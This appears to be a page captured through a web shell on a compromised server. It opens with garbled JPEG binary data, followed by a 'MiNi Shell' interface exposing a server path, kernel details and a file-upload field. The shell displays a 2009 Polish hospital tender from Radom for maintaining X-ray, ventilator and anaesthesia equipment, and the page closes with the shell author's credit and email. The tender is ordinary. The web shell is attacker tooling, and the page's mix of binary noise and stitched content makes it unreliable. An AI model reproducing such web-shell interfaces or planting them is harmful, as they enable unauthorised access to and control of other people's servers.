JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090107/6255-N-2009.html

<p class="kh_header"><b>Radom: Świadczenie usług napraw, przeglądów i konserwacji sprzętu medycznego w Radomskim Szpitalu Specjalistycznym</b><br>
<b>Numer ogłoszenia: 6255 - 2009; data zamieszczenia: 07.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług napraw, przeglądów i konserwacji sprzętu medycznego w Radomskim Szpitalu Specjalistycznym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres nr 1 - aparaty RTG i ciemnie automatyczne
Aparaty do zdjęć RTG
1.Wykonywanie konserwacji i przeglądów co najmniej raz na kwartał lub zgodnie z instrukcją eksploatacji urządzenia,
2.Przygotowanie sprzętu do badań technicznych i wydawanie orzeczeń o stanie technicznym,
3.Wykonywanie bieżących napraw i usuwanie awarii.
4.Zebranie informacji o pracy aparatu /wywiad u użytkownika/.
5.Sprawdzenie stanu technicznego elementów mechanicznych:
a)linek stalowych przeciwwag
b)zawieszenia kołpaków, ekranów
c)stanu konstrukcji aparatu, łożysk i prowadnic.
6.Sprawdzenie obwodów zasilania sieciowego, zabezpieczeń przeciwzwarciowych i ochrony przeciwporażeniowej.
7.Konserwacja zewnętrzna i wewnętrzna aparatu (smarowanie, niezbędne regulacje i ustawienia)
8.Sprawdzenie osprzętu i wyposażenia współpracującego z aparatem (kratki Bucky, stojaki do zdjęć odległościowych, fototimery i inne ).
9.Sprawdzenie torów wizyjnych RTG ( jeśli występują):
a.kontrola pracy układów elektronicznych
b.przeprowadzenie niezbędnych regulacji i ustawień.
10.Zgłoszenie do Działu Technicznego koniecznych napraw lub wymiany podzespołów.
11.Dokonanie wpisu z przeprowadzonej konserwacji do paszportu urządzenia.
Aparaty będące przedmiotem zamówienia to: Arcovis 6HF, TUR D-800, Mini Dent, Polymobil, TUR-800, Irix 70, D-800S.

Wywoływarki automatyczne RTG
1.Wykonywanie konserwacji i przeglądów co najmniej raz na kwartał lub zgodnie z instrukcją eksploatacji urządzenia,
2.Przygotowanie sprzętu do badań technicznych i wydawanie orzeczeń o stanie technicznym,
3.Wykonywanie bieżących napraw i usuwanie awarii.
4.Zebranie informacji o pracy aparatu /wywiad u użytkownika/.
5.Oględziny zewnętrzne i sprawdzenie elementów mechanicznych.
6.Kontrola pracy układów grzejnych, wentylatorów, termostatów, elektrozaworów i pomp.
7.Sprawdzenie stanu wałków gumowych.
8.Konserwacja zewnętrzna i wewnętrzna aparatu (smarowanie, niezbędne regulacje i ustawienia)
9.Sprawdzenie obwodów zasilania sieciowego, zabezpieczeń przeciwzwarciowych i ochrony przeciwporażeniowej.
10.Mycie chemiczne ( nie rzadziej niż co trzy miesiące ). 
11.Zgłoszenie do Działu Technicznego koniecznych napraw lub wymiany podzespołów.
12.Dokonanie wpisu z przeprowadzonej konserwacji do paszportu urządzenia.
Aparaty będące przedmiotem zamówienia to: Compact C-35, C-45, Compact 2 SX-2

Zakres nr 2 - respiratory
1.Wykonywanie konserwacji i przeglądów co najmniej raz na kwartał lub zgodnie z instrukcją eksploatacji urządzenia,
2.Przygotowanie sprzętu do badań technicznych i wydawanie orzeczeń o stanie technicznym,
3.Wykonywanie bieżących napraw i usuwanie awarii.
4.Zebranie informacji o pracy aparatu /wywiad u użytkownika/.
5.Sprawdzenie szczelności zaworów zasilania O2 i powietrza.
6.Sprawdzenie działania regulatora oddechu wspomaganego, zastawki pacjenta, wyłącznika czasowego (timera).
7.Wymiana zużytych uszczelek i dokonanie niezbędnych regulacji i ustawień.
8.Sprawdzenie osprzętu współpracującego z aparatem (rury karbowane, dreny, itp.). W przypadku uszkodzenia należy wymienić.
9.Sprawdzenie obwodów zasilania sieciowego, zabezpieczeń przeciwzwarciowych i ochrony przeciwporażeniowej.
10.Zgłoszenie do Działu Technicznego koniecznych napraw lub wymiany podzespołów.
11.Dokonanie wpisu z przeprowadzonej konserwacji do paszportu urządzenia.
UWAGA: przeprowadzanie przeglądów i konserwacji należy wykonywać zgodnie z ustalonym harmonogramem, nie rzadziej niż raz na kwartał.
Aparaty będące przedmiotem zamówienia: Relog, Asistor, Sechrist, Pulmolog, Bird, CPAP.

Zakres nr 3 - aparaty do znieczulania
1.Wykonywanie konserwacji i przeglądów co najmniej raz na kwartał lub zgodnie z instrukcją eksploatacji urządzenia,
2.Przygotowanie sprzętu do badań technicznych i wydawanie orzeczeń o stanie technicznym,
3.Wykonywanie bieżących napraw i usuwanie awarii.
4.Zebranie informacji o pracy aparatu /wywiad u użytkownika/.
5.Sprawdzenie szczelności zaworów zasilania O2 i N2O.
6.Sprawdzenie przepływów i kontrola zaworu dozującego.
7.Wymiana zużytych uszczelek i dokonanie niezbędnych regulacji i ustawień.
8.Sprawdzenie osprzętu współpracującego z aparatem (rury karbowane, dreny, pojemniki i butle). W przypadku uszkodzenia należy wymienić.
9.Sprawdzenie obwodów zasilania sieciowego, zabezpieczeń przeciwzwarciowych i ochrony przeciwporażeniowej.
10.Zgłoszenie do Działu Technicznego koniecznych napraw lub wymiany podzespołów.
11.Dokonanie wpisu z przeprowadzonej konserwacji do paszportu urządzenia.
Aparaty będące przedmiotem zamówienia: PA-2, PA-1, Ventilog, N-6, Anemat N-8, Medimorth..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zakres nr 1 - 1.500,00 PLN 
Zakres nr 2 -    350,00 PLN 
Zakres nr 3 -    450,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki ogólne:
Wykonawca nie może podlegać wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24, ust. 1 i ust. 2 ustawy Prawo zamówień publicznych.
Warunki szczegółowe:
Potencjał kadrowy: Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania przedmiotu zamówienia, posiadającymi następujące uprawnienia:
Zakres nr 1
Osoba wykonująca zamówienie musi posiadać świadectwo kwalifikacyjne w zakresie eksploatacji i dozoru grupa 1, pkt. 2 oraz pkt. 10 w zakresie pkt. 2
Zakres nr 2 i 3:
Osoba wykonująca zamówienie musi posiadać świadectwo kwalifikacyjne w zakresie eksploatacji i dozoru grupa 1 pkt. 2 łącznie ze sprzętem medycznym oraz pkt. 10 w zakresie pkt. 2.
Uprawnienia określono wg załącznika nr 1 do Rozporządzenia Ministra  Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003 r. (Dz. U. Nr 89, poz. 828 z późn. zm.)
Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę.
Doświadczenie: Wykonawca wykaże, że przez okres jednego roku w ciągu ostatnich trzech lat wykonał min. jedną usługę w zakresie określonym w przedmiocie zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę.
Potencjał techniczny: Wykonawca dysponuje potencjałem technicznym niezbędnym do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę
Potencjał finansowo-ekonomiczny: Wykonawca dysponuje własnymi środkami finansowymi zapewniającymi wykonanie zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę

Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24, ust. 1 i ust. 2 ustawy Pzp.
2.Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22, ust. 1, pkt. 1-3 ustawy Pzp. 
3.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, a w przypadku wykonawcy, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej - dokument wystawiony w kraju w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono jego upadłości, jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej zastępuję się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiedniego kraju pochodzenia osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.Informacja o doświadczeniu zawodowym Wykonawcy (Doświadczenie zawodowe). Wykaz wykonanych w ciągu ostatnich trzech lat przed wszczęciem postępowania, a jeżeli okres działalności jest krótszy - w tym okresie zamówień odpowiadających swoim rodzajem i wartością oferowanemu przedmiotowi zamówienia. Informacja musi potwierdzać spełnienie szczegółowego warunku udziału w postępowaniu. Do informacji muszą być załączone dokumenty potwierdzające, że wymienione w informacji usługi zostały wykonane należycie.
5.Informację o osobach, które będą skierowane do wykonania zamówienia (potencjał kadrowy) wraz z kserokopiami ich uprawnień..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych i Zaopatrzenia
ul. Lekarska 4 pok. nr 308 lub 309 A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2009 godzina 09:30, miejsce: Dział Zamówień Publicznych i Zaopatrzenia
ul. Lekarska 4 pok. nr 308 lub 309 A.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> aparaty RTG i ciemnie automatyczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparaty do zdjęć RTG
1.Wykonywanie konserwacji i przeglądów co najmniej raz na kwartał lub zgodnie z instrukcją eksploatacji urządzenia,
2.Przygotowanie sprzętu do badań technicznych i wydawanie orzeczeń o stanie technicznym,
3.Wykonywanie bieżących napraw i usuwanie awarii.
4.Zebranie informacji o pracy aparatu /wywiad u użytkownika/.
5.Sprawdzenie stanu technicznego elementów mechanicznych:
a.linek stalowych przeciwwag
b.zawieszenia kołpaków, ekranów
c.stanu konstrukcji aparatu, łożysk i prowadnic.
6.Sprawdzenie obwodów zasilania sieciowego, zabezpieczeń przeciwzwarciowych i ochrony przeciwporażeniowej.
7.Konserwacja zewnętrzna i wewnętrzna aparatu (smarowanie, niezbędne regulacje i ustawienia)
8.Sprawdzenie osprzętu i wyposażenia współpracującego z aparatem (kratki Bucky, stojaki do zdjęć odległościowych, fototimery i inne ).
9.Sprawdzenie torów wizyjnych RTG ( jeśli występują):
a.kontrola pracy układów elektronicznych
b.przeprowadzenie niezbędnych regulacji i ustawień.
10.Zgłoszenie do Działu Technicznego koniecznych napraw lub wymiany podzespołów.
11.Dokonanie wpisu z przeprowadzonej konserwacji do paszportu urządzenia.
Aparaty będące przedmiotem zamówienia to: Arcovis 6HF, TUR D-800, Mini Dent, Polymobil, TUR-800, Irix 70, D-800S.
Wywoływarki automatyczne RTG
1.Wykonywanie konserwacji i przeglądów co najmniej raz na kwartał lub zgodnie z instrukcją eksploatacji urządzenia,
2.Przygotowanie sprzętu do badań technicznych i wydawanie orzeczeń o stanie technicznym,
3.Wykonywanie bieżących napraw i usuwanie awarii.
4.Zebranie informacji o pracy aparatu /wywiad u użytkownika/.
5.Oględziny zewnętrzne i sprawdzenie elementów mechanicznych.
6.Kontrola pracy układów grzejnych, wentylatorów, termostatów, elektrozaworów i pomp.
7.Sprawdzenie stanu wałków gumowych.
8.Konserwacja zewnętrzna i wewnętrzna aparatu (smarowanie, niezbędne regulacje i ustawienia)
9.Sprawdzenie obwodów zasilania sieciowego, zabezpieczeń przeciwzwarciowych i ochrony przeciwporażeniowej.
10.Mycie chemiczne ( nie rzadziej niż co trzy miesiące ). 
11.Zgłoszenie do Działu Technicznego koniecznych napraw lub wymiany podzespołów.
12.Dokonanie wpisu z przeprowadzonej konserwacji do paszportu urządzenia.
Aparaty będące przedmiotem zamówienia to: Compact C-35, C-45, Compact 2 SX-2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> respiratory.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Wykonywanie konserwacji i przeglądów co najmniej raz na kwartał lub zgodnie z instrukcją eksploatacji urządzenia,
2.Przygotowanie sprzętu do badań technicznych i wydawanie orzeczeń o stanie technicznym,
3.Wykonywanie bieżących napraw i usuwanie awarii.
4.Zebranie informacji o pracy aparatu /wywiad u użytkownika/.
5.Sprawdzenie szczelności zaworów zasilania O2 i powietrza.
6.Sprawdzenie działania regulatora oddechu wspomaganego, zastawki pacjenta, wyłącznika czasowego (timera).
7.Wymiana zużytych uszczelek i dokonanie niezbędnych regulacji i ustawień.
8.Sprawdzenie osprzętu współpracującego z aparatem (rury karbowane, dreny, itp.). W przypadku uszkodzenia należy wymienić.
9.Sprawdzenie obwodów zasilania sieciowego, zabezpieczeń przeciwzwarciowych i ochrony przeciwporażeniowej.
10.Zgłoszenie do Działu Technicznego koniecznych napraw lub wymiany podzespołów.
11.Dokonanie wpisu z przeprowadzonej konserwacji do paszportu urządzenia.
UWAGA: przeprowadzanie przeglądów i konserwacji należy wykonywać zgodnie z ustalonym harmonogramem, nie rzadziej niż raz na kwartał.
Aparaty będące przedmiotem zamówienia: Relog, Asistor, Sechrist, Pulmolog, Bird, CPAP..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> aparaty do znieczulania.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Wykonywanie konserwacji i przeglądów co najmniej raz na kwartał lub zgodnie z instrukcją eksploatacji urządzenia,
2.Przygotowanie sprzętu do badań technicznych i wydawanie orzeczeń o stanie technicznym,
3.Wykonywanie bieżących napraw i usuwanie awarii.
4.Zebranie informacji o pracy aparatu /wywiad u użytkownika/.
5.Sprawdzenie szczelności zaworów zasilania O2 i N2O.
6.Sprawdzenie przepływów i kontrola zaworu dozującego.
7.Wymiana zużytych uszczelek i dokonanie niezbędnych regulacji i ustawień.
8.Sprawdzenie osprzętu współpracującego z aparatem (rury karbowane, dreny, pojemniki i butle). W przypadku uszkodzenia należy wymienić.
9.Sprawdzenie obwodów zasilania sieciowego, zabezpieczeń przeciwzwarciowych i ochrony przeciwporażeniowej.
10.Zgłoszenie do Działu Technicznego koniecznych napraw lub wymiany podzespołów.
11.Dokonanie wpisu z przeprowadzonej konserwacji do paszportu urządzenia.
Aparaty będące przedmiotem zamówienia: PA-2, PA-1, Ventilog, N-6, Anemat N-8, Medimorth..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com